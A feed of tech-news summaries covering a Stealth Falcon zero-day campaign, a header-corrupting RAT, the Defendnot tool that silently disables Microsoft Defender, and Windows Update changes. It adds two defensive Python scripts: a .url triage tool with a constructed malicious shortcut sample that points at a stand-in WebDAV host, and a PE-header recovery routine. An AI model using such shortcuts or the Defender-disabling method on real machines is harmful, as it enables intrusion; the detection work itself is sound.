API

Winsage
June 17, 2025
Discord Messenger is a new third-party client that lets users on legacy systems such as Windows XP, Windows 95, and NT 3.1 reach the platform. It talks to the Discord API the same way the web application does, which the developers say allows third-party client development without repercussions from Discord. They overcame TLS compatibility problems on systems that lack modern cipher suites and wrote shims for API calls that older systems do not provide. Runtime problems on Windows NT 3.1 were addressed by backporting features missing from that release.
Winsage
June 10, 2025
A cyberattack campaign by the advanced persistent threat group Stealth Falcon targeted a prominent Turkish defense company using a zero-day vulnerability tracked as CVE-2025-33053. The flaw let the attackers control the working directory of legitimate Windows tools, so that those tools executed malware served from attacker-controlled WebDAV servers. The attack began with a spear-phishing email carrying a malicious .url file that launched a legitimate Internet Explorer utility; with its working directory pointed at the WebDAV server, the utility was abused to run the attackers' files. The attackers used process hollowing to bypass traditional defenses. Stealth Falcon, also known as FruityArmor, has conducted cyber espionage since at least 2012, targeting government and defense organizations in Turkey, Qatar, Egypt, and Yemen. The multi-stage infection chain led to the deployment of "Horus Agent," a custom implant built for reconnaissance and equipped with anti-analysis techniques. Researchers also identified other custom tools used by the group, including a "DC Credential Dumper" for domain controller credentials and a custom keylogger. The group repurposes legitimate domains so that its infrastructure blends with legitimate traffic, complicating detection.
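The primitive described above, a .url file that launches a local program with its working directory on a remote WebDAV share, leaves a simple artifact on disk. The following is an added example, not code from the researchers who reported the campaign: a triage script that parses Internet Shortcut (.url) files and flags a WorkingDirectory= pointing at a network path, especially in combination with a local file:// target. The .url format is a plain INI file with an [InternetShortcut] section. The sample shortcut, the host 203.0.113.10 (a documentation address) and the program name legit-tool.exe are constructed placeholders and do not come from the reported attack; the rule names are hypothetical.

```python
import configparser
import re
import sys
from typing import List, Tuple

# Heuristics for .url files (added example, not the reported campaign's tooling).
UNC_PATH = re.compile(r"^\\\\[^\\]+\\")                        # \\host\share\...
WEBDAV_UNC = re.compile(r"^\\\\[^\\@]+@(?:SSL@)?\d+\\", re.I)   # \\host@80\... or \\host@SSL@443\...
LOCAL_TARGET = re.compile(r"^(?:file:|[a-z]:\\)", re.I)        # file:///C:/... or C:\...

# Constructed samples: 203.0.113.10 is a documentation address, legit-tool.exe a placeholder.
SAMPLE_MALICIOUS = r"""[InternetShortcut]
URL=file:///C:/Program Files/Internet Explorer/legit-tool.exe
WorkingDirectory=\\203.0.113.10@80\share
IconIndex=0
"""

SAMPLE_BENIGN = r"""[InternetShortcut]
URL=https://example.com/
"""


def load_shortcut(path: str) -> str:
    """Read a .url file from disk; Windows writes them as UTF-16 with a BOM or as ANSI."""
    with open(path, "rb") as fh:
        raw = fh.read()
    if raw.startswith((b"\xff\xfe", b"\xfe\xff")):
        return raw.decode("utf-16")
    return raw.decode("utf-8", errors="replace")


def parse_internet_shortcut(text: str) -> dict:
    """Return the keys of the [InternetShortcut] section, preserving key case."""
    cp = configparser.ConfigParser(interpolation=None, delimiters=("=",))
    cp.optionxform = str  # keep 'URL' / 'WorkingDirectory' as written
    cp.read_string(text)
    if not cp.has_section("InternetShortcut"):
        return {}
    return dict(cp["InternetShortcut"])


def assess_shortcut(text: str) -> List[Tuple[str, str]]:
    """Return (rule_id, detail) findings for the body of one .url file."""
    fields = parse_internet_shortcut(text)
    url = fields.get("URL", "").strip()
    cwd = fields.get("WorkingDirectory", "").strip()
    findings: List[Tuple[str, str]] = []
    remote_cwd = bool(UNC_PATH.match(cwd))
    if remote_cwd:
        # \\host@port\ and DavWWWRoot are the redirector's WebDAV forms of a UNC path
        kind = "WebDAV-style" if WEBDAV_UNC.match(cwd) or "davwwwroot" in cwd.lower() else "UNC"
        findings.append(("remote-working-directory",
                         f"WorkingDirectory is a {kind} network path: {cwd}"))
    if remote_cwd and LOCAL_TARGET.match(url):
        # the shortcut starts a local program whose current directory lives on a remote host
        findings.append(("local-target-remote-cwd",
                         f"local target {url} launched with its working directory on a remote host"))
    return findings


if __name__ == "__main__":
    paths = sys.argv[1:]
    if not paths:
        for label, body in (("constructed malicious", SAMPLE_MALICIOUS), ("constructed benign", SAMPLE_BENIGN)):
            print(label, "->", assess_shortcut(body))
    for path in paths:
        print(path, "->", assess_shortcut(load_shortcut(path)))
```

This is a triage heuristic for the delivery artifact, not a detector for the WebDAV flaw itself: a shortcut with a remote working directory is unusual enough in mail attachments to warrant a look, but legitimate shortcuts on file shares can also carry UNC working directories, so treat the result as a lead rather than a verdict.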
AppWizard
June 4, 2025
Google has updated the Gemini Nano APIs through the ML Kit, introducing new GenAI APIs that allow developers to perform on-device inference for generative AI capabilities in Android applications. These APIs enhance user privacy by executing all operations locally, eliminating cloud processing costs. Features include summarization of articles up to 3,000 words, proofreading for grammatical accuracy, rewriting text in various tones, and generating image descriptions. The GenAI APIs are optimized for Android devices using MediaTek Dimensity, Qualcomm Snapdragon, and Google Tensor platforms, including the Pixel 9 series and Samsung Galaxy S25. They operate without internet connectivity, ensuring rapid response times and improved performance for tasks like summarization and proofreading. The local processing also enhances privacy and security, protecting sensitive user information with safety protocols.
Tech Optimizer
June 2, 2025
Organizations are transitioning from legacy database systems like Microsoft SQL Server and Oracle to open-source alternatives such as PostgreSQL to reduce costs and enhance scalability. This migration process involves several steps, including schema conversion, business logic transformation, data migration, application changes, and performance tuning. Amazon Bedrock aids this process by automating schema and code conversion, data transformation, identifying code compatibility issues, and generating test cases for validation. The migration challenges include adapting database objects to PostgreSQL's syntax, converting stored procedures and functions, executing ETL processes for data accuracy, modifying application code, and optimizing performance. Amazon Bedrock utilizes generative AI to simplify these tasks, significantly reducing manual effort and errors. An example of code conversion from Microsoft SQL Server to PostgreSQL is provided, illustrating how to convert a stored procedure into a PostgreSQL function while generating corresponding test cases. The process involves using the Amazon Bedrock chat interface to submit prompts for conversion and validation. To support the migration, table creation scripts for the Employees and SalaryUpdateLog tables are included, along with test data that covers various employee scenarios. This data allows for comprehensive testing of the converted function, ensuring it correctly applies salary updates based on specified criteria.
Winsage
May 31, 2025
A new strain of malware has been running undetected on Windows systems for several weeks, using an evasion technique that corrupts its own Portable Executable (PE) headers to hinder detection. Security researchers found it in the memory of a compromised system during an investigation: a 33GB memory dump revealed the implant inside a dllhost.exe process with process ID 8200. The malware, classified as a remote access trojan (RAT) by Fortinet, uses batch scripts and PowerShell commands in its attack chain and can capture screenshots, act as a remote server, and manipulate system services. Its command-and-control traffic is encrypted, which complicates detection. Its distinctive feature is the deliberate corruption of the DOS and PE headers, which hinders reverse engineering and makes reconstructing the executable from a memory dump difficult. Researchers had to manually locate the entry point and rebuild the import table before the sample would run in a controlled environment.
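Wiping the MZ and PE signatures defeats tools that locate an image by those magic values, but a mapped image usually keeps its section table, and the section table sits immediately after the optional header. The following is an added example, not the researchers' tooling or the malware's code: it reports which header fields of a memory-resident image are damaged and recovers AddressOfEntryPoint by finding the section table through its recognisable names and walking back to the optional header. It assumes the COFF and optional headers and the section table survived; the constructed sample wipes only the DOS header and the PE signature, and the constants, section names and entry point are made up for the demonstration.

```python
import struct
from typing import Optional

# Added example; not the researchers' tooling. Offsets follow the PE/COFF layout.
DOS_SIGNATURE = b"MZ"
NT_SIGNATURE = b"PE\x00\x00"
COFF_HEADER_SIZE = 20
SECTION_HEADER_SIZE = 40
OPTIONAL_HEADER_MAGIC = {0xE0: 0x10B, 0xF0: 0x20B}  # optional header size -> magic (PE32 / PE32+)


def header_status(image: bytes) -> dict:
    """Check the DOS header, e_lfanew and PE signature of an image as found in memory."""
    status = {"mz_ok": False, "e_lfanew": None, "pe_sig_ok": False, "entry_point": None}
    if len(image) < 0x40:
        return status
    status["mz_ok"] = image[:2] == DOS_SIGNATURE
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    status["e_lfanew"] = e_lfanew
    entry_off = e_lfanew + 4 + COFF_HEADER_SIZE + 16  # AddressOfEntryPoint is 16 bytes into the optional header
    if entry_off + 4 <= len(image) and image[e_lfanew:e_lfanew + 4] == NT_SIGNATURE:
        status["pe_sig_ok"] = True
        status["entry_point"] = struct.unpack_from("<I", image, entry_off)[0]
    return status


def _plausible_section_header(image: bytes, off: int) -> bool:
    """A section header starts with a '.'-prefixed ASCII name and carries a page-aligned RVA."""
    if off + SECTION_HEADER_SIZE > len(image):
        return False
    name = image[off:off + 8].rstrip(b"\x00")
    if len(name) < 2 or name[0:1] != b"." or not all(0x21 <= c < 0x7F for c in name):
        return False
    rva = struct.unpack_from("<I", image, off + 12)[0]  # VirtualAddress
    return rva != 0 and rva % 0x1000 == 0


def find_section_table(image: bytes, limit: int = 0x1000) -> Optional[int]:
    """Scan the header page for two consecutive plausible section headers."""
    last = min(limit, len(image)) - 2 * SECTION_HEADER_SIZE
    for off in range(0, last + 1):
        if _plausible_section_header(image, off) and _plausible_section_header(image, off + SECTION_HEADER_SIZE):
            return off
    return None


def recover_entry_point(image: bytes) -> Optional[int]:
    """Recover AddressOfEntryPoint without trusting the MZ/PE signatures."""
    table = find_section_table(image)
    if table is None:
        return None
    for opt_size, magic in OPTIONAL_HEADER_MAGIC.items():
        opt_off = table - opt_size  # the optional header immediately precedes the section table
        if opt_off >= 0 and struct.unpack_from("<H", image, opt_off)[0] == magic:
            return struct.unpack_from("<I", image, opt_off + 16)[0]
    return None


def build_sample_image(entry_point: int = 0x1234) -> bytes:
    """Constructed minimal PE32 header page (not a real binary): DOS header, PE signature,
    COFF header, optional header and two section headers, zero-padded to one page."""
    e_lfanew = 0x80
    dos = bytearray(e_lfanew)
    dos[:2] = DOS_SIGNATURE
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 0xE0, 0x102)  # i386, 2 sections, PE32 optional size
    optional = bytearray(0xE0)
    struct.pack_into("<H", optional, 0, 0x10B)          # PE32 magic
    struct.pack_into("<I", optional, 16, entry_point)   # AddressOfEntryPoint
    struct.pack_into("<I", optional, 28, 0x400000)      # ImageBase
    sections = b"".join(
        struct.pack("<8sIIIIIIHHI", name, 0x1000, rva, 0x1000, rva, 0, 0, 0, 0, flags)
        for name, rva, flags in ((b".text", 0x1000, 0x60000020), (b".rdata", 0x3000, 0x40000040))
    )
    image = bytes(dos) + NT_SIGNATURE + coff + optional + sections
    return image + b"\x00" * (0x1000 - len(image))


def corrupt_headers(image: bytes) -> bytes:
    """Mimic the evasion: wipe the DOS header (including e_lfanew) and the PE signature."""
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    damaged = bytearray(image)
    damaged[:0x40] = b"\x00" * 0x40
    damaged[e_lfanew:e_lfanew + 4] = b"\x00" * 4
    return bytes(damaged)


if __name__ == "__main__":
    intact = build_sample_image()
    damaged = corrupt_headers(intact)
    print("intact :", header_status(intact))
    print("damaged:", header_status(damaged))
    print("recovered entry point: 0x%x" % recover_entry_point(damaged))
```

The name heuristic only recognises the conventional dot-prefixed section names; a sample with renamed sections, or one that also zeroes the optional header, still needs the manual work the researchers describe, and the recovered entry point must be cross-checked against the code that is actually mapped there.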
Winsage
May 29, 2025
Microsoft is enhancing its Windows Update tool to manage updates for both its products and third-party applications, aiming to streamline the update process. A private preview for developers will be initiated, focusing on business applications but eventually accommodating a wider range of apps. The new "Windows Update orchestration platform" will allow developers to integrate their applications into a unified system that intelligently schedules updates based on factors like user activity and battery status. This platform will provide an API for updates through Windows Update, improving user experience by centralizing updates and allowing better control over the update process. The initiative addresses the fragmented experience IT administrators face and aims to create a cohesive update process. Critics note the delay in implementing a unified update framework, while the initiative also seeks to enhance security by consolidating updates and reducing the risks associated with ad-hoc update agents.
Tech Optimizer
May 29, 2025
Every modern Windows PC ships with Microsoft Defender, a built-in antivirus. A tool called Defendnot disables Microsoft Defender by tricking Windows into believing another antivirus is active: it uses an undocumented API to register a counterfeit antivirus product, after which Defender disables itself automatically and without notifying the user. Defendnot creates a scheduled task for persistence and lets the displayed antivirus name be customised. It succeeds an earlier project, No-Defender, which was taken down over a copyright complaint. Microsoft Defender currently flags Defendnot as a threat.
Winsage
May 28, 2025
Microsoft is introducing a "Windows Update orchestration platform" that allows third-party developers to integrate their applications with Windows Update. This platform, currently in preview, provides an API for developers to register their apps as update providers, enabling seamless scheduling, downloading, and installation of updates. Developers can defer updates based on user activity and system performance, while users will benefit from a unified update history for all supported applications. Developers interested in the private preview can contact Microsoft at unifiedorchestrator@service.microsoft.com.
Winsage
May 28, 2025
Microsoft has initiated a limited public preview of Windows Backup for Organizations to simplify the backup and restoration of device settings for enterprise customers, facilitating the transition from Windows 10 to Windows 11. The company is developing a unified orchestration platform to manage all operating system and software updates, addressing issues related to the current fragmented update process. This platform will be built on the Windows Update stack and provide an API for developers to integrate their applications. Benefits include eco-conscious scheduling, a centralized notification system, holistic update history, streamlined troubleshooting, easier management for IT administrators, and support for common app types. The orchestrator is currently in early development and available only as a private preview, with a focus on enterprises, although a consumer-oriented solution may be possible in the future.